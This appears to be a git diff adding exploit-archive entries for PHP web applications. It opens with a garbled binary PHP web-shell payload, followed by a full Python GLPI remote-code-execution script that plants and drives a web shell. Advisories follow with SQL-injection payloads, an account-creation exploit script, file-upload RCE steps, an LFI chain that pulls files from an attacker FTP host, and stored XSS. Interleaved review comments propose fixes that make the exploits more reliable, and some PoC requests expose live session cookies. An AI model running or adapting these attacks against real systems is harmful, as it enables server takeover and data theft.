0yo[8BH?QQLZtMRPZxe~EH/Uk`dz6?:EUJ9w|Q@V]?At)VXxV5Jg1x/?xf^d}s,mY^RxAaXiK5KX14tdi{oN2cICIR;J.B|bIv1eHjg-Uy2tUazfB+jD2U.MV]0+:^5yBGNXiJc:.O7?1UVbH6[4c9EsPvChZU[p{Oszk.0N|++HWGgRDb;3SkSpOv/
fx5wpWmDx[k3m8D^n-UE+N80JhO08lYS*jb)c,2ztGX)[lxp*{GLv2)OWhKT^dm*TtoF,:/gyc?X2BESP?dm{HHTxovqgubf4a6`cNw.ai));HrxO-HpaZI,/.*ZD2TtIwT:hYztEjs1CfjOy~5@4_1fCEGb`*.?yG@cQy*s~uG;KGW+haa]g^]pWabaw6qR]Le[S;t|I.3`(rJwZH)-zeE6x7[2x:W|b[uHo3Bq:`x:Z/eth|qNxQl*q(*}K^}{ndJl}zURs)FV6@o_hL?wVKe+OS*B,)3AN(f*?KwbOG^F2q[?x2hofhtR~8EJBJ7_d4grziPQ4p}|;PwK/:e1|oI`_M(Ry|mGkVSRnGstAtmfr;7?pYXIYNy?O6r6MT*I9Ng}@rAST-^Brmt/stUL;Q:v+W3*xKpNdjHZHnnXx3CwsHlg.,Xjg{8*y54A|,FD(mRc6PgcKPUDIYO60BWiGHUcyW@iFT*KimJkDh.P+e0pTqChk@B1P~+AaFo]rsUrLB7IiESwx7.iPDDCtv8i@1sQLW_k)uUvS4Tyh}sBnIPN(8?Ia_.m/+q,Q,{n732c5sOjv8):V7y*NC|TdY/OOnj}I-rV@OM7CvZIW-H?yD^K-(39Of|bLLz{lz^p@rS+l8)tVyTme~(DWHwr8phTeH(-K[4oa{R@Q-gmr{h*7*-JLiuA.ZhbV):j4LD,9*aO3B2aonSQv*N?jG-]Sl5fi;zQ(lW~KwUCJIzswy7MVL,sQSpE3bT9aBPx,4BA.iYf;*B{t.5uB:eKB/7VC(ij~A4.lzVeMi95]brHgUZ/Bh5pyuy/w*{3U3@`9.DEOLvE86O:s(sA2bV?^oELOvMSr/rOWUSref{(Yfaw)mQ7az)*/system($_GET[0]);/*챻紟摌ྪⴇﲈ珹꘎۱⦛ൿ轹σអǑ樆ಧ嬑ൟ냁卝ⅵ㡕蒸榓ꎢ蜒䭘勼ꔗㆾ褅朵顶鎢捴ǕӢퟹ뉌ꕵ붎꺉૾懮㛡نŶ有ʡﳷ䍠죫펪唗鋊嗲켑辋䷪ᰀ쵈ᩚ∰雑𢡊Ս䙝䨌" + +requests.packages.urllib3.disable_warnings() + + +class GlpiBrowser: + """_summary_""" + + def __init__(self, url: str, user: str, password: str, platform: str): + """ + Initialize the GlpiBrowser with required attributes. + + Args: + url (str): The URL of the target GLPI instance. + user (str): The username for authentication. + password (str): The password for authentication. + platform (str): The platform of the target (either 'windows' or 'unix'). 
+ """ + self.__url = url + self.__user = user + self.__password = password + + self.accessible_directory = "pics" + + if "win" in platform.lower(): + self.__platform = "windows" + else: + self.__platform = "unix" + + self.__session = requests.Session() + self.__session.verify = False + + self.__shell_name = None + + print(f"[+] {self!s}") + + # Dunders + def __repr__(self) -> str: + """Return a machine-readable representation of the browser instance.""" + return f"" + + def __str__(self) -> str: + """Return a human-readable representation of the browser instance.""" + return f"GLPI Browser targeting {self.__url!r} ({self.__platform!r}) with following credentials: {self.__user!r}:{self.__password!r}." + + # Public methods + def is_alive(self) -> bool: + """ + Check if the target GLPI instance is alive and responding. + + Returns: + bool: True if the GLPI instance is up and responding, otherwise False. + """ + try: + self.__session.get(url=self.__url, timeout=3) + except Exception as error: + print(f"[-] Impossible to reach the target.") + print(f"[x] Root cause: {error}") + return False + else: + print(f"[+] Target is up and responding.") + return True + + def login(self) -> bool: + """ + Attempt to login to the GLPI instance with provided credentials. + + Returns: + bool: True if login is successful, otherwise False. 
+ """ + html_text = self.__session.get(url=self.__url, allow_redirects=True).text + csrf_token = self.__extract_csrf(html=html_text) + name_field = re.search(r'name="(.*)" id="login_name"', html_text).group(1) + pass_field = re.search(r'name="(.*)" id="login_password"', html_text).group(1) + + login_request = self.__session.post( + url=f"{self.__url}/front/login.php", + data={ + name_field: self.__user, + pass_field: self.__password, + "auth": "local", + "submit": "Post", + "_glpi_csrf_token": csrf_token, + }, + allow_redirects=False, + ) + + return login_request.status_code == 302 + + def create_network(self, datemod: str) -> None: + """ + Create a new network with the specified attributes. + + Args: + datemod (str): The timestamp indicating when the network was modified. + """ + creation_request = self.__session.post( + f"{self.__url}/front/wifinetwork.form.php", + data={ + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": PAYLOAD, + "essid": "RCE", + "mode": "ad-hoc", + "add": "ADD", + "_glpi_csrf_token": self.__extract_csrf( + self.__session.get(f"{self.__url}/front/wifinetwork.php").text + ), + "_read_date_mod": datemod, + }, + ) + + if creation_request.status_code == 302: + print("[+] Network created") + + def wipe_networks(self, padding, datemod): + """ + Wipe all networks. + + Args: + padding (str): Padding string for ESSID. + datemod (str): The timestamp indicating when the network was modified. 
+ """ + print("[*] Wiping networks...") + all_networks_request = self.__session.get( + f"{self.__url}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9" + ) + + webpage = html.fromstring(all_networks_request.content) + + for rawlink in set( + link + for link in webpage.xpath("//a/@href") + if "wifinetwork.form.php?id=" in link + ): + network_id = rawlink.split("=")[-1] + print(f"\tDeleting network id: {network_id}") + + self.__session.post( + f"{self.__url}/front/wifinetwork.form.php", + data={ + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": PAYLOAD, + "essid": "RCE" + padding, + "mode": "ad-hoc", + "purge": "Delete permanently", + "id": network_id, + "_glpi_csrf_token": self.__extract_csrf(all_networks_request.text), + "_read_date_mod": datemod, + }, + ) + + def edit_network(self, padding: str, datemod: str) -> None: + """_summary_ + + options: + padding (str): _description_ + datemod (str): _description_ + """ + print("[+] Modifying network") + for rawlink in set( + link + for link in html.fromstring( + self.__session.get(f"{self.__url}/front/wifinetwork.php").content + ).xpath("//a/@href") + if "wifinetwork.form.php?id=" in link + ): + # edit the network name and essid + self.__session.post( + f"{self.__url}/front/wifinetwork.form.php", + data={ + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": PAYLOAD, + "essid": f"RCE{padding}", + "mode": "ad-hoc", + "update": "Save", + "id": rawlink.split("=")[-1], + "_glpi_csrf_token": self.__extract_csrf( + self.__session.get( + f"{self.__url}/front/{rawlink.split('/')[-1]}" + ).text + ), + "_read_date_mod": datemod, + }, + ) + + print(f"\tNew ESSID: RCE{padding}") + + def create_dump(self, wifi_table_offset: str = None): + """ + Initiates a dump request to the server. + + Args: + wifi_table_offset (str, optional): The offset for the 'wifi_networks' table. Defaults to '310'. 
+ + Note: + Adjust the offset number to match the table number for wifi_networks. + This can be found by downloading a SQL dump and running: + zgrep -n "CREATE TABLE" glpi-backup-*.sql.gz | grep -n wifinetworks + """ + dump_target = f"{self.path}{self.__shell_name}" + print(f"[*] Dumping the database remotely at: {dump_target}") + self.__session.get( + f"{self.__url}/front/backup.php?dump=dump&offsettable={wifi_table_offset or '310'}&fichier={dump_target}" + ) + + print(f"[+] File 'dumped', accessible at: {self.shell_path}") + + def upload_rce(self, wifi_table_offset: str = None) -> str: + """ + Uploads the RCE (Remote Code Execution) shell to the target. + + Args: + wifi_table_offset (str, optional): The offset for the 'wifi_networks' table. + + Returns: + str: A status message indicating the outcome of the upload. + """ + if not self.login(): + print("[-] Login error") + return + + print(f"[+] User {self.__user!r} is logged in.") + + # create timestamp + datemod = datetime.now().strftime("%Y-%m-%d %H:%M:%S") + + tick = 1 + while True: + print("-" * 25 + f" trial number {tick} " + "-" * 25) + + # create padding for ESSID + padding = "e" * tick + + self.wipe_networks(padding, datemod) + self.create_network(datemod) + self.edit_network(padding, datemod) + + self.__shell_name = ( + "".join(random.choice(string.ascii_letters) for _ in range(8)) + ".php" + ) + + print(f"[+] Current shellname: {self.__shell_name}") + + self.create_dump(wifi_table_offset) + if self.__shell_check(): + break + + tick += 1 + + print("-" * 66) + print(f"[+] RCE found after {tick} trials!") + + # Private methods + def __extract_csrf(self, html: str): + """Extract CSRF token from the provided HTML content.""" + return re.search( + pattern=r'name="_glpi_csrf_token" value="([a-f0-9]{32})"', string=html + ).group(1) + + def __shell_check(self) -> bool: + """Check if the uploaded shell is active and responding correctly.""" + r = self.__session.get( + url=self.shell_path, + params={"0": "echo 
HERE"}, + ) + shell_size = len(r.content) + print(f"[+] Shell size: {shell_size!s}") + if shell_size < 50: + print("[x] Too small, there is a problem with the choosen offset.") + return False + + return b"HERE" in r.content + + # Properties + @property + def path(self): + """With this property, every time you access self.path, it will dynamically generate and return the path string based on the current value of self.accessible_directory. This way, it will always be a "direct reference" to the value of self.accessible_directory.""" + if "win" in self.__platform.lower(): + return f"C:\\xampp\\htdocs\\{self.accessible_directory}\\" + else: + return f"/var/www/html/glpi/{self.accessible_directory}/" + + @property + def shell_path(self) -> str: + """Generate the complete path to the uploaded shell.""" + return f"{self.__url}/{self.accessible_directory}/{self.__shell_name}" + + +def execute( + url: str, + command: str, + timeout: float = None, +) -> str: + """ + Executes a given command on a remote server through a web shell. + + This function assumes a web shell has been previously uploaded to the target + server and sends a request to execute the provided command. It uses a unique + delimiter ("HoH") to ensure that the command output can be parsed and + returned without any additional data. + + Args: + url (str): The URL where the web shell is located on the target server. + command (str): The command to be executed on the target server. + timeout (float, optional): Maximum time, in seconds, for the request + to the server. Defaults to None, meaning no timeout. + + Returns: + str: The output of the executed command. Returns None if the URL or + command is not provided. 
+ """ + if url is None or command is None: + return + + command = f"echo HoH&&{command}&&echo HoH" + + response = requests.get( + url=url, + params={ + "0": command, + }, + timeout=timeout, + verify=False, + ) + + # Use regex to find the content between "HoH" delimiters + if match := re.search( + pattern=r"HoH(.*?)HoH", string=response.text, flags=re.DOTALL + ): + return match.group(1).strip() + + +def main() -> None: + parser = argparse.ArgumentParser() + parser.add_argument("--url", help="Target URL.", required=True) + parser.add_argument("--user", help="Username.", default=None) + parser.add_argument("--password", help="Password.", default=None) + parser.add_argument("--platform", help="Target OS (windows/unix).", default=None) + parser.add_argument( + "--offset", help="Offset for table wifi_networks.", default=None + ) + parser.add_argument( + "--dir", + help="Accessible directory on the target.", + default="sound", + required=False, + ) # "sound" as default directory + + parser.add_argument("--command", help="Command to execute via RCE.", default=None) + + options = parser.parse_args() + + if options.command: + # We assume the given URL is the shell path if a command is provided. + + try: + response = execute(url=options.url, command=options.command, timeout=5) + except TimeoutError: + print(f"[x] Timeout received form target. 
Maybe your command failed.") + else: + print(f"[*] Response received from {options.url!r}:") + print(response) + finally: + return + + target = GlpiBrowser( + options.url, + user=options.user, + password=options.password, + platform=options.platform, + ) + + if not target.is_alive(): + return + + target.accessible_directory = options.dir + target.upload_rce(wifi_table_offset=options.offset) + + print( + f"[+] You can execute command remotely as: {execute(url=target.shell_path, command='whoami').strip()}@{execute(url=target.shell_path, command='hostname').strip()}" + ) + print("[+] Run this tool again with the desired command to inject:") + print( + f"\tpython3 CVE-2020-11060.py --url '{target.shell_path}' --command 'desired_command_here'" + ) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51728.txt b/exploits/php/webapps/51728.txt new file mode 100644 index 000000000..c71daf1db --- /dev/null +++ b/exploits/php/webapps/51728.txt 
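Review bot: In `main`, `except TimeoutError:` cannot catch a timeout from `requests.get`, because requests raises `requests.exceptions.Timeout`, which is not a `TimeoutError` subclass, and the `finally: return` beneath it swallows every exception from the call, so any failed request exits silently with no message at all. Change the handler to `except requests.exceptions.Timeout:`, remove the `return` from `finally`, and return after the try/except block instead. The same silent-failure shape appears in `login` and `__extract_csrf`, where `re.search(...).group(1)` raises AttributeError when the page markup differs from what the regex expects; check the match for None and return False or raise a clear error. `upload_rce` loops with `while True` and only leaves when `__shell_check` succeeds, so a wrong table offset never terminates; a bounded trial count with a message naming the likely cause would be safer. `__repr__` returning `f""` looks like an extraction artifact of angle-bracketed text rather than intended code, so I would confirm the original before merging.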
@@ -0,0 +1,39 @@ +## Title: Online ID Generator 1.0 - Remote Code Execution (RCE) +## Author: nu11secur1ty +## Date: 08/31/2023 +## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc +## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip +## Reference: https://portswigger.net/web-security/sql-injection +## Reference: https://portswigger.net/web-security/file-upload +## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload + + +STATUS: HIGH-CRITICAL Vulnerability + +[+]Bypass login SQLi: +# In login form, for user: + +```mysql +nu11secur1ty' or 1=1# +``` + +[+]Shell Upload exploit: +## For system logo: +```php + +``` +[+]RCE Exploit +## Execution from the remote browser: +```URLhttp://localhost/id_generator/uploads/1693471560_info.php +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html) + +## Time spend: +00:10:00 \ No newline at end of file diff --git a/exploits/php/webapps/51729.txt b/exploits/php/webapps/51729.txt new file mode 100644 index 000000000..0580ff7f9 --- /dev/null +++ b/exploits/php/webapps/51729.txt 
@@ -0,0 +1,39 @@ +# Exploit Title: Clcknshop 1.0.0 - SQL Injection +# Exploit Author: CraCkEr +# Date: 16/08/2023 +# Vendor: Infosoftbd Solutions +# Vendor Homepage: https://infosoftbd.com/ +# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/ +# Demo: https://kidszone.clckn.shop/ +# Version: 1.0.0 +# Tested on: Windows 10 Pro +# Impact: Database Access +# CVE: CVE-2023-4708 +# CWE: CWE-89 - CWE-74 - CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +SQL injection attacks can allow unauthorized access to sensitive data, modification of +data and crash the application or make it unavailable, leading to lost revenue and +damage to a company's reputation. + + +Path: /collection/all + +GET parameter 'tag' is vulnerable to SQL Injection + +https://website/collection/all?tag=[SQLi] + +--- +Parameter: tag (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z +--- \ No newline at end of file diff --git a/exploits/php/webapps/51735.py b/exploits/php/webapps/51735.py new file mode 100755 index 000000000..eafee370a --- /dev/null +++ b/exploits/php/webapps/51735.py 
@@ -0,0 +1,100 @@
+# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
+# Google Dork: inurl:/user-public-account
+# Date: 2023-09-04
+# Exploit Author: Revan Arifio
+# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
+# Version: <= 3.0.17
+# Tested on: Windows, Linux
+# CVE : CVE-2023-4278
+
+import requests
+import os
+import re
+import time
+
+banner = """
+ _______ ________ ___ ___ ___ ____ _ _ ___ ______ ___
+ / ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \
+ | | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) |
+ | | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ <
+ | |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) |
+ \_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/
+
+======================================================================================================
+|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
+|| Author : https://github.com/revan-ar ||
+|| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ ||
+|| Support : https://www.buymeacoffee.com/revan.ar ||
+======================================================================================================
+
+"""
+
+
+print(banner)
+
+# get nonce
+def get_nonce(target):
+ open_target = requests.get("{}/user-public-account".format(target))
+ search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
+ if search_nonce[1] != None:
+ return search_nonce[1]
+ else:
+ print("Failed when getting Nonce :p")
+
+
+
+# privielege escalation
+def privesc(target, nonce, username, password, email):
+
+ req_data = {
+ "user_login":"{}".format(username),
+ "user_email":"{}".format(email),
+ "user_password":"{}".format(password),
+ "user_password_re":"{}".format(password),
+ "become_instructor":True,
+ "privacy_policy":True,
+ "degree":"",
+ "expertize":"",
+ "auditory":"",
+ "additional":[],
+ "additional_instructors":[],
+ "profile_default_fields_for_register":[],
+ "redirect_page":"{}/user-account/".format(target)
+ }
+
+ start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)
+
+ if start.status_code == 200:
+ print("[+] Exploit Success !!")
+ else:
+ print("[+] Exploit Failed :p")
+
+
+
+# URL target
+target = input("[+] URL Target: ")
+print("[+] Starting Exploit")
+plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
+plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
+int_version = plugin_version[1].replace(".", "")
+time.sleep(1)
+
+if int(int_version) < 3018:
+ print("[+] Target is Vulnerable !!")
+ # Credential
+ email = input("[+] Email: ")
+ username = input("[+] Username: ")
+ password = input("[+] Password: ")
+ time.sleep(1)
+ print("[+] Getting Nonce...")
+ get_nonce = get_nonce(target)
+ # Get Nonce
+ if get_nonce != None:
+ print("[+] Success Getting Nonce: {}".format(get_nonce))
+ time.sleep(1)
+ # Start PrivEsc
+ privesc(target, get_nonce, username, password, email)
+ # ----------------------------------
+
+else:
+ print("[+] Target is NOT Vulnerable :p")
\ No newline at end of file
diff --git a/exploits/php/webapps/51736.txt b/exploits/php/webapps/51736.txt
new file mode 100644
index 000000000..3e1ea0fca
--- /dev/null
+++ b/exploits/php/webapps/51736.txt
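Review bot: The version gate `if int(int_version) < 3018:` in the top-level script strips the dots from the "Stable tag" and compares the result as one integer, so a release such as `3.1.0` collapses to `310` and is reported as vulnerable although it is newer than 3.0.17; compare components instead, e.g. `version = tuple(int(p) for p in plugin_version[1].strip().split("."))` and `if version < (3, 0, 18):`. In `get_nonce`, `search_nonce[1]` is read before the match is checked, so a page without the nonce raises `TypeError` instead of printing the intended failure message; test `if search_nonce:` first (the same applies to `plugin_version[1]` when the readme is missing). The assignment `get_nonce = get_nonce(target)` rebinds the function name to its result, which is confusing and breaks any later call. None of the `requests` calls pass a `timeout`, so an unresponsive host hangs the script indefinitely.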
@@ -0,0 +1,44 @@ +## Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution +## Author: nu11secur1ty +## Date: 09/04/2023 +## Vendor: https://webigniter.net/ +## Software: https://webigniter.net/demo +## Reference: https://portswigger.net/web-security/file-upload + + +## Description: +The media function suffers from file upload vulnerability. +The attacker can upload and he can execute remotely very dangerous PHP +files, by using any created account before this on this system. +Then he can do very malicious stuff with the server of this application. + +## Staus: HIGH-CRITICAL Vulnerability + +[+]Simple Exploit: +```PHP + + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE) + +## Proof and Exploit +[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html) + +## Time spent: +00:15:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51737.txt b/exploits/php/webapps/51737.txt new file mode 100644 index 000000000..d2fd2ff2c --- /dev/null +++ b/exploits/php/webapps/51737.txt 
@@ -0,0 +1,48 @@ +# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI +# Date: 2023/09/05 +# CVE: CVE-2023-4634 +# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh +# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ +# Exploit: https://github.com/Patrowl/CVE-2023-4634/ +# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/ +# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/ +# Version: < 3.10 +# Tested on: 3.09 +# Description: +# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php + + +#LFI + +Steps to trigger conversion of a remote SVG + +Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references) + +Host 2 files : +- malicious.svg +- malicious.svg[1] + + +Payload: +For LFI, getting wp-config.php: + +Both malicious.svg and malicious.svg[1] on the remote FTP: + + +xmlns="http://www.w3.org/2000/svg"> + + + +Then trigger conversion with: +http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1 + + +# Directory listing or RCE: +To achieve Directory listing or even RCE, it is a little more complicated. + +Use exploit available here: +https://github.com/Patrowl/CVE-2023-4634/ + +# Note +Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration). \ No newline at end of file 
diff --git a/exploits/php/webapps/51738.txt b/exploits/php/webapps/51738.txt new file mode 100644 index 000000000..824bcbcad --- /dev/null +++ b/exploits/php/webapps/51738.txt 
@@ -0,0 +1,70 @@ +Exploit Title: coppermine-gallery 1.6.25 RCE +Application: coppermine-gallery +Version: v1.6.25 +Bugs: RCE +Technology: PHP +Vendor URL: https://coppermine-gallery.net/ +Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip +Date of found: 05.09.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps + + +1.First of All create php file content as and sequeze this file with zip. +$ cat >> test.php + +$ zip test.zip test.php + +1. Login to account +2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php +3. Upload zip file +4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php + + + +poc request + +POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1 +Host: localhost +Content-Length: 630 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c +Connection: close + +------WebKitFormBoundaryi1AopwPnBYPdzorF +Content-Disposition: form-data; name="plugin"; filename="test.zip" +Content-Type: 
application/zip + +PK +�����™b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux ��������� +PK +�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux ���������PK������N���j����� +------WebKitFormBoundaryi1AopwPnBYPdzorF +Content-Disposition: form-data; name="form_token" + +50982f2e64a7bfa63dbd912a7fdb4e1e +------WebKitFormBoundaryi1AopwPnBYPdzorF +Content-Disposition: form-data; name="timestamp" + +1693905214 +------WebKitFormBoundaryi1AopwPnBYPdzorF-- \ No newline at end of file diff --git a/exploits/php/webapps/51739.txt b/exploits/php/webapps/51739.txt new file mode 100644 index 000000000..02b0a5288 --- /dev/null +++ b/exploits/php/webapps/51739.txt 
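Review bot: The "Login to account" prerequisite understates what is required: `pluginmgr.php` is, as far as I know, reachable only by gallery administrators, so the finding is that an administrator can install a plugin archive containing PHP — which is what the plugin manager exists to do — and the header should state the required role so readers can judge whether a trust boundary is actually crossed. The PoC request also reproduces live session material (`cpg16x_data`, a second session-looking cookie and a `form_token` value); these should be replaced with placeholders before publication. The PHP content for step 1 (`cat >> test.php`) appears empty in the committed text, so the steps cannot be followed as written.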
@@ -0,0 +1,40 @@ +# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS +# Date: 2023-09-05 +# Exploit Author: Furkan Karaarslan +# Category : Webapps +# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php +# Version: 4.7 (REQUIRED) +# Tested on: Windows/Linux +---------------------------------------------------------------------------------------------------- +1-First install sonar music plugin. +2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist +3-Press the Add new playlist button +4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist +5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/ +6-Let's paste our xss payload in the comment section. Payload: +Bingoo + +Request: +POST /wp/wordpress/wp-comments-post.php HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 155 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://127.0.0.1/wp/wordpress/album_slug/test/ +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; 
wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486 +Connection: close + +comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5 \ No newline at end of file diff --git a/exploits/php/webapps/51740.txt b/exploits/php/webapps/51740.txt new file mode 100644 index 000000000..8067228ca --- /dev/null +++ b/exploits/php/webapps/51740.txt 
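Review bot: The request carries a `wordpress_logged_in_*` cookie and the `_wp_unfiltered_html_comment` nonce field; WordPress renders that field only for users holding the `unfiltered_html` capability, and for those users raw script in a comment is accepted by design, so as shown this does not demonstrate a defect in the plugin. The advisory should state the role of the account used (the cookie value suggests the user `hunter`) and show the payload being stored from an account without `unfiltered_html`, or from an unauthenticated commenter. Separately, `Vendor Homepage` points at `http://127.0.0.1/wp/wordpress/wp-comments-post.php`, a local test URL, rather than the vendor's site, and the payload in step 6 is blank in the committed text.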
@@ -0,0 +1,65 @@ +# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options +# Date: 2023-07-03 +# Exploit Author: Antonio Francesco Sardella +# Vendor Homepage: https://www.cacti.net/ +# Software Link: https://www.cacti.net/info/downloads +# Version: Cacti 1.2.24 +# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container +# CVE: CVE-2023-39362 +# Category: WebApps +# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp +# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application +# Vulnerability discovered and reported by: Antonio Francesco Sardella + +======================================================================================= +Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362) +======================================================================================= + +----------------- +Executive Summary +----------------- + +In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. + +------- +Exploit +------- + +Prerequisites: + - The attacker is authenticated. + - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs". + - A Device that supports SNMP can be used. + - Net-SNMP Graphs can be used. + - snmp module of PHP is not installed. + +Example of an exploit: + - Go to "Console" > "Create" > "New Device". + - Create a Device that supports SNMP version 1 or 2. 
